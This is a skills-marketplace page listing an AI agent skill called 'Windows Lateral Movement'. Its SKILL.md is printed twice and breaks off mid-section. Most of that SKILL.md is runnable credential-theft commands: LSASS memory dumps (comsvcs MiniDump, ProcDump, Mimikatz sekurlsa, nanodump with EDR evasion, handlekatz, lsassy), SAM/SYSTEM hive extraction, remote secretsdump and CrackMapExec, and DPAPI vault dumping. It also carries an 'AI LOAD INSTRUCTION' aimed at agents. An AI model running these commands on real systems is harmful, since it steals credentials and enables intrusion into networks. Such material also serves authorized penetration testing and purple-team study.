Windows Lateral Movement

Name: Windows Lateral Movement
Author: yaklang

yaklang/hack-skills

Load reference procedures for authorized Windows credential extraction and lateral-movement testing when you run professional penetration tests or defensive purple-team labs—not for everyday app shipp

Install

npx skills add https://github.com/yaklang/hack-skills --skill windows-lateral-movement

What is this skill?

Compares seven LSASS dump approaches (comsvcs MiniDump, ProcDump, Mimikatz, nanodump, handlekatz, PPLdump, remote lsassy
Documents comsvcs.dll and PowerShell rundll32 MiniDump invocations with admin and SeDebugPrivilege requirements
Covers ProcDump Sysinternals usage with -ma against lsass.exe
Positions LSASS/SAM/DPAPI/NTDS topics as an adjunct to the main lateral-movement SKILL.md
Includes AV detection risk notes per method in a comparison table

Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 0/3 security scanners passed (skills.sh audits).

Recommended Skills

Azure Compliancemicrosoft/azure-skills

Azure Compliance is a Microsoft agent skill for solo builders and small teams who need structured security and complianc…373k installs·1.2k stars

Openclaw Secure Linux Cloudxixu-me/skills

OpenClaw Secure Linux Cloud guides a hardened VPS deployment—rootless Podman, loopback-only gateway, SSH-tunneled Contro…201k installs·61 stars

Entra Agent Idmicrosoft/azure-skills

entra-agent-id is a Microsoft-authored agent skill for provisioning and operating OAuth-capable identities tailored to A…99.1k installs·1.2k stars

Firebase Security Rules Auditorfirebase/agent-skills

Firebase Security Rules Auditor turns your agent into a senior penetration-style reviewer for Firestore rulesets. Solo b…40.3k installs·345 stars

Firestore Security Rules Auditorfirebase/agent-skills

Firestore-security-rules-auditor is a checker skill for solo builders and small teams shipping Firebase-backed apps who …20.3k installs·345 stars

Skill Vetteruseai-pro/openclaw-skills-security

Skill Vetter is a security-first OpenClaw agent skill that makes your coding agent behave like a pre-install auditor for…19.2k installs·62 stars

Journey fit

Primary fit

Offensive Windows techniques belong on the Ship shelf under security validation for environments where you are explicitly testing exposure before or after release. Credential dumping and lateral movement are core security-assessment subtasks distinct from routine unit tests or CI linting.

Common Questions / FAQ

Is Windows Lateral Movement safe to install?

skills.sh reports 0 of 3 security scanners passed. Review the Security Audits panel on this page before installing in production.

SKILL.md

READMESKILL.md - Windows Lateral Movement

# Credential Dumping Techniques

> **AI LOAD INSTRUCTION**: Load this for LSASS dump methods, SAM/SYSTEM extraction, DPAPI secrets, cached domain credentials, and NTDS.dit extraction. Assumes the main [SKILL.md](./SKILL.md) is already loaded for lateral movement techniques.

---

## 1. LSASS MEMORY DUMP TECHNIQUES

### Method Comparison

| Method | Tool | AV Detection Risk | Requires | Notes |
|---|---|---|---|---|
| MiniDump (comsvcs.dll) | Built-in Windows DLL | Medium | Admin + SeDebugPrivilege | Commonly monitored |
| ProcDump | Sysinternals (signed) | Medium-High | Admin | Microsoft-signed, but well-known |
| Mimikatz | Custom | High | Admin + SeDebugPrivilege | Most capable, most detected |
| nanodump | Custom | Low | Admin + SeDebugPrivilege | Uses MiniDumpWriteDump variants |
| handlekatz | Custom | Low | Admin | Clone LSASS handle, then dump |
| PPLdump | Custom | Low | Admin | Bypass PPL (Protected Process Light) |
| lsassy | Remote (Impacket) | Medium | Admin SMB access | Remote dump + parse, no disk touch |

### comsvcs.dll MiniDump

```cmd
# Find LSASS PID
tasklist /fi "imagename eq lsass.exe"

# Dump using comsvcs.dll (built-in Windows DLL)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump PID C:\temp\lsass.dmp full
```

```powershell
# PowerShell variant
$lsass = Get-Process lsass
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass.Id C:\temp\lsass.dmp full
```

### ProcDump (Sysinternals)

```cmd
procdump -ma lsass.exe lsass.dmp -accepteula
```

### Mimikatz (Direct Memory Read)

```cmd
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest           & REM WDigest plaintext (if enabled)
mimikatz # sekurlsa::kerberos          & REM Kerberos tickets
mimikatz # sekurlsa::msv               & REM NTLM hashes
```

### nanodump (EDR Evasion)

```cmd
# Direct syscalls, unhooks NTDLL, avoids API hooks
nanodump.exe --write C:\temp\lsass.dmp
nanodump.exe --fork --write C:\temp\lsass.dmp   & REM Fork process first (stealthier)
```

### handlekatz

```cmd
# Clone LSASS handle from another process (avoids direct LSASS open)
handlekatz.exe --pid LSASS_PID --outfile C:\temp\lsass.dmp
```

### Remote Dump with lsassy

```bash
# From Linux — dump and parse remotely
lsassy -u administrator -p password TARGET_IP
lsassy -u administrator -H NTLM_HASH TARGET_IP

# Specific dump method
lsassy -u administrator -p password TARGET_IP -m comsvcs
lsassy -u administrator -p password TARGET_IP -m nanodump
```

### Parse Dump Offline

```bash
# Mimikatz offline parsing
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords

# pypykatz (Python, cross-platform)
pypykatz lsa minidump lsass.dmp
```

---

## 2. SAM / SYSTEM / SECURITY HIVE EXTRACTION

### Local Extraction

```cmd
# reg save (requires admin)
reg save HKLM\SAM C:\temp\SAM
reg save HKLM\SYSTEM C:\temp\SYSTEM
reg save HKLM\SECURITY C:\temp\SECURITY

# Volume Shadow Copy
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM
```

### Remote Extraction

```bash
# Impacket secretsdump (remote, in-memory)
secretsdump.py DOMAIN/administrator:password@TARGET_IP

# With hash
secretsdump.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP

# CrackMapExec
crackmapexec smb TARGET_IP -u administrator -p password --sam
crackmapexec smb TARGET_IP -u administrator -p password --lsa
```

### Offline Parsing

```bash
# Impacket secretsdump offline
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL

# Extract local account hashes + cached domain creds + LSA secrets
```

---

## 3. DPAPI SECRETS

DPAPI protects browser passwords, Wi-Fi keys, credential manager entries, and more.

### Credential Manager

```cmd
# List stored credentials
cmdkey /list

# Mimikatz — dump DPAPI credentials
mimikatz # vault::cred
mimikatz # vault::list

# Decrypt DPAPI blob

What is this skill?

Compares seven LSASS dump approaches (comsvcs MiniDump, ProcDump, Mimikatz, nanodump, handlekatz, PPLdump, remote lsassy

Documents comsvcs.dll and PowerShell rundll32 MiniDump invocations with admin and SeDebugPrivilege requirements

Covers ProcDump Sysinternals usage with -ma against lsass.exe

Positions LSASS/SAM/DPAPI/NTDS topics as an adjunct to the main lateral-movement SKILL.md

Includes AV detection risk notes per method in a comparison table

Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 0/3 security scanners passed (skills.sh audits).

Journey fit

Primary fit

SKILL.md

READMESKILL.md - Windows Lateral Movement

# Credential Dumping Techniques

> **AI LOAD INSTRUCTION**: Load this for LSASS dump methods, SAM/SYSTEM extraction, DPAPI secrets, cached domain credentials, and NTDS.dit extraction. Assumes the main [SKILL.md](./SKILL.md) is already loaded for lateral movement techniques.

---

## 1. LSASS MEMORY DUMP TECHNIQUES

### Method Comparison

| Method | Tool | AV Detection Risk | Requires | Notes |
|---|---|---|---|---|
| MiniDump (comsvcs.dll) | Built-in Windows DLL | Medium | Admin + SeDebugPrivilege | Commonly monitored |
| ProcDump | Sysinternals (signed) | Medium-High | Admin | Microsoft-signed, but well-known |
| Mimikatz | Custom | High | Admin + SeDebugPrivilege | Most capable, most detected |
| nanodump | Custom | Low | Admin + SeDebugPrivilege | Uses MiniDumpWriteDump variants |
| handlekatz | Custom | Low | Admin | Clone LSASS handle, then dump |
| PPLdump | Custom | Low | Admin | Bypass PPL (Protected Process Light) |
| lsassy | Remote (Impacket) | Medium | Admin SMB access | Remote dump + parse, no disk touch |

### comsvcs.dll MiniDump

```cmd
# Find LSASS PID
tasklist /fi "imagename eq lsass.exe"

# Dump using comsvcs.dll (built-in Windows DLL)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump PID C:\temp\lsass.dmp full
```

```powershell
# PowerShell variant
$lsass = Get-Process lsass
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass.Id C:\temp\lsass.dmp full
```

### ProcDump (Sysinternals)

```cmd
procdump -ma lsass.exe lsass.dmp -accepteula
```

### Mimikatz (Direct Memory Read)

```cmd
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest           & REM WDigest plaintext (if enabled)
mimikatz # sekurlsa::kerberos          & REM Kerberos tickets
mimikatz # sekurlsa::msv               & REM NTLM hashes
```

### nanodump (EDR Evasion)

```cmd
# Direct syscalls, unhooks NTDLL, avoids API hooks
nanodump.exe --write C:\temp\lsass.dmp
nanodump.exe --fork --write C:\temp\lsass.dmp   & REM Fork process first (stealthier)
```

### handlekatz

```cmd
# Clone LSASS handle from another process (avoids direct LSASS open)
handlekatz.exe --pid LSASS_PID --outfile C:\temp\lsass.dmp
```

### Remote Dump with lsassy

```bash
# From Linux — dump and parse remotely
lsassy -u administrator -p password TARGET_IP
lsassy -u administrator -H NTLM_HASH TARGET_IP

# Specific dump method
lsassy -u administrator -p password TARGET_IP -m comsvcs
lsassy -u administrator -p password TARGET_IP -m nanodump
```

### Parse Dump Offline

```bash
# Mimikatz offline parsing
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords

# pypykatz (Python, cross-platform)
pypykatz lsa minidump lsass.dmp
```

---

## 2. SAM / SYSTEM / SECURITY HIVE EXTRACTION

### Local Extraction

```cmd
# reg save (requires admin)
reg save HKLM\SAM C:\temp\SAM
reg save HKLM\SYSTEM C:\temp\SYSTEM
reg save HKLM\SECURITY C:\temp\SECURITY

# Volume Shadow Copy
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM
```

### Remote Extraction

```bash
# Impacket secretsdump (remote, in-memory)
secretsdump.py DOMAIN/administrator:password@TARGET_IP

# With hash
secretsdump.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP

# CrackMapExec
crackmapexec smb TARGET_IP -u administrator -p password --sam
crackmapexec smb TARGET_IP -u administrator -p password --lsa
```

### Offline Parsing

```bash
# Impacket secretsdump offline
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL

# Extract local account hashes + cached domain creds + LSA secrets
```

---

## 3. DPAPI SECRETS

DPAPI protects browser passwords, Wi-Fi keys, credential manager entries, and more.

### Credential Manager

```cmd
# List stored credentials
cmdkey /list

# Mimikatz — dump DPAPI credentials
mimikatz # vault::cred
mimikatz # vault::list

# Decrypt DPAPI blob

Install

What is this skill?

Recommended Skills

Journey fit

Is Windows Lateral Movement safe to install?

SKILL.md

This week for builders

Install

What is this skill?

Recommended Skills

Journey fit

Is Windows Lateral Movement safe to install?

SKILL.md